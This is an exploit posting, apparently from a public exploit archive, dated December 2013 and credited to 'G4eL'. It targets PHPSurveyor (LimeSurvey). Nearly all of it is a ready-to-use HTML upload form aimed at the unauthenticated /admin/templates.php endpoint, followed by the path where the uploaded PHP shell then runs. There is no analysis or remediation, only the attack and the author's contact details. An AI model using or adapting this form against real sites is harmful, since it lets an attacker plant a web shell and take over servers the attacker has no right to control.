Home / exploits PHPSurveyor Shell Upload
Posted on 27 December 2013
################################################## ################-=[ G4eL ]=-###################### ################################################## Exploit Title: PHPSurveyor - Shell Upload Exploit Author: G4eL Date: 26/12/2013 Product: PHPSurveyor Official Site: http://www.limesurvey.org/ Risk Level: High ################################################# ################################################# /admin/templates.php - File Upload [URL SITE] = Default directory of PHPSurveyor Example : http://site.com/survey/ <form enctype='multipart/form-data' name='importsurvey' action='[URL SITE]/admin/templates.php' method='post'> <input class='btstyle' name="the_file" type="file" size="7"> <input type='submit' value='Upload' class='btstyle' disabled> <input type='hidden' name='editfile' value=''> <input type='hidden' name='screenname' value=''> <input type='hidden' name='templatename' value='default'> <input type='hidden' name='action' value='upload'> </form> File Uploaded in templates "default"! Example: http://site.com/survey/templates/default/G4eL.php "/templates/name of template/name of your file" ################################################# #################-=[ Contact ]=-################# 2403342020@qq.com (Email) live:s3cur3 (Skype) #################################################
